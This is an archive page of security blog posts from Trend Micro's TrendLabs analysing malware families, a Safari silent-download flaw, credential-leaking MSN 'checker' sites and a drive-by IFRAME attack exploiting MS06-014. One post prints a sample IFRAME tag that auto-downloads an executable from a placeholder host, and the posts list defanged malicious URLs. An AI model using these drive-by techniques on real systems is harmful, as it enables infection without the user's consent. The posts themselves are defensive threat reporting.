Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Recent Posts

  • Calendar

    December 2014
    S M T W T F S
    « Nov    
     123456
    78910111213
    14151617181920
    21222324252627
    28293031  
  • Email Subscription

  • About Us
    TrendLabs Security Intelligence Blog(breadcrumbs are unavailable)

    Author Archive - Lordian Mosuela (Threats Analyst)




    This month I’ve witnessed an evolution of file infectors/viruses in manipulating system infection. The diagram below shows the development from the old malware file to its new structure:

    Old Infector Structure

    New Infector Structure

    Notice that unlike the “old” malware structure where all malware routines are contained in a single complete module, the PE file is now stripped into three parts, with propagation and download routines thrown in the picture.

    This new infection routine starts with the “mother” file infector, which essentially contains the infection procedure. This part searches for executable files, where it then adds its code.

    The infected files, in turn, contain the malware’s download routine, as well as an encrypted text file. When decrypted, the said text file points to another URL from which it downloads the executable file (which is a split module of the mother file infector), thereby restarting the whole infection routine. Note that the use of encrypted text is done to create a static site where the malware author can modify the data and source URL, especially when the link is already detected by an Internet security or anti-malware product.

    An example of malware using such a method is PE_LIJI.A-O (the mother file infector). Its infected files are detected as PE_LIJI.A, which, in turn, downloads malicious files detected as WORM_DROM.AI.

    In addition, WORM_DROM.AI performs routines that can disable anti-malware products. It displays an error message upon the execution of the software, as shown below:

    WORM_DROM.AIerror

    The LIJI-DROM tandem is yet another example of how threats are getting complex (routine-wise, to avoid immediate detection), how they are using the Web to leverage their malicious motives, and how “traditional” Internet security/Web blocking solutions is not enough.

    Fortunately for customers, the security industry is evolving along with these threats — what with proactive and heuristic detection, and in the case of Trend Micro Web Reputation Services. Otherwise, the cleanup for this type of file infection will take NOT only three steps.

     
    Posted in Malware | Comments Off



    A full disclosure report from Insecure.org refers to a flaw in Safari 3.0.3 which allows local zones to access external domains. The Safari 3 Public Beta was released on June 11 for Mac OS X and Windows XP/Vista. This beta version is for trial purposes and intended to gather feedback prior to a full release.

    True enough, we have found that the Safari version 3.0.3(522.15.5) Web browser for the Windows OS automatically downloads a file referred to in an IFRAME tag used on a certain site, for example,

    iframe src=”http://www.XXXX.com/XXXX.exe” mce_src=”http://www.XXXX.com/XXXX.exe” name=”iframe” id=”iframe”

    Unlike IE and Firefox, which displays an alert message like the one below whenever a file is about to be downloaded onto the system, this Safari version does not display any sort of notification.

    A behind the scenes look using the Ethereal Network Analyzer further reveals that the system is indeed being commanded to download a file.

    The flaw has potential for misuse and may become a possible source of violations of user rights against entities downloading files on a system without user consent. As of this writing, this bug has also been found to work on iPhone 1.0.2.

    Additional information provided by Leander Yu.

     
    Posted in Vulnerabilities | Comments Off



    We have received a number of cases today regarding the verification of the following New Zealand Web sites:

    • hxxp://www.msncheckstatus.tk
    • hxxp://www.real-msn.tk
    • hxxp://www.instant-messenger.tk
    • hxxp://www.msndelete-contacts.tk
    • hxxp://www.get-contacts-messenger.tk

    Once visited, these sites direct users to hxxp://www.get-messenger.com, a site for Get Messenger. It is a tool capable of logging into MSN Messenger® servers as a regular instant messaging (IM) client. It authenticates users using the user account and password, retrieves his or her contact list, analyses it and shows which contacts removed the user from the contact list.

    Screenshot of Get Messenger Web site

    The following is stated in the site’s FAQ page:

    Is Messenger-Tips a Worm?

    Definition: A computer worm is a self-replicating computer program. It uses a network to send copies of itself to other nodes (computer terminals on the network) and it may do so without any user intervention. Unlike a virus, it does not need to attach itself to an existing program. Worms always harm the network (if only by consuming bandwidth), whereas viruses always infect or corrupt files on a targeted computer.

    Messenger-Tips does not send copies of itself, it does not work without user intervention and it does not harm the network or any computer. Messenger-Tips is not a worm.

    Screenshot of Get Messenger Screen

    However, the authentication method in delivering the account credentials, such as the user�s name and password, is not secure. Using Follow TCP Stream, an ethereal packet capture tool, we�re able to capture an instance when a user name and password are being sent to the program server. Below is the image capture:

    Follow FTP Stream Capture

    This type of insecurity can easily expose a user�s account information to online identity thieves.

    Credits to Trend Threat Analyst Lordian Mosuela!

     
    Posted in Bad Sites | Comments Off



    After the Italian Job and the Russian Uprising, malware authors are now heading to the other side of the globe to spread “the love for malware”. A malicious IFRAME tag found in one of the files submitted by a customer contains the following:



    {File containing malicious IFRAME tag}



    The URL http://www.{BLOCKED}b.jp/index.htm contains a malicious JavaScript detected by Trend Micro as JS_AGENT.AAQI. The said JavaScript exploits the Microsoft Data Access Components vulnerability, discussed in Microsoft Security Bulletin MS06-014, to download and execute a file detected as TSPY_LINEAGE.ACZ.



    The end result, the download and execution of a spyware, may lead us into thinking that malware authors may be timing this malicious move with the release of the online game Lineage II’s Saga 2: The Chaotic Throne in Southeast Asia. The online gaming community, which grows in numbers, must be aware of this Japanese uprising.



    Trend Micro customers need not worry, as the aforementioned malware programs are detected and removed from affected systems. We also strongly recommend keeping software applications up-to-date by applying security patches released by vendors.

     
    Posted in Bad Sites | Comments Off


    Aug17
    1:51 am (UTC-7)   |    by

    From using icons of popular applications to displaying windows and images to running normal applications (e.g., Notepad), malware have gone great lengths in attempting to hide their routines from affected users. Among the latest trends in stealth mechanism is best characterized by the ZLOB family of Trojans, known for posing as video codecs to lure unsuspecting users to download and execute them.

    Recently, TrendLabs has detected WORM_SILLY.CQ, and its own twist in the malware game of hide-and-seek is that it installs Chinese Navigation 2.6.0.0 (aka Baidu Search Toolbar), China’s most popular Internet search engine. The Baidu Search Toolbar is usually seen in Internet Explorer’s standard button bar and address bar. Unfortunately, that’s not the only program WORM_SILLY.CQ installs, as it is designed to drop and download a slew of Trojans and spyware into an affected.

    Installing “normal” programs is not really a novel technique, but given the worm’s specific target via its choice of program to install (i.e., Chinese computing population), it’s clear that the malware is banking on Baidu’s popularity in order to infect more users. On the other hand, the technique also spells bad news for the search engine maker because, unless otherwise intended, no software company really wants to be associated with malware, right? Users are thus encouraged to keep their pattern files updated in order to prevent infection of this worm (as well as its malicious components). Should they wish to remove Chinese Navigation toolbar, it can be simply uninstalled via Add/Remove Programs.

     
    Posted in Bad Sites | Comments Off


     

    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice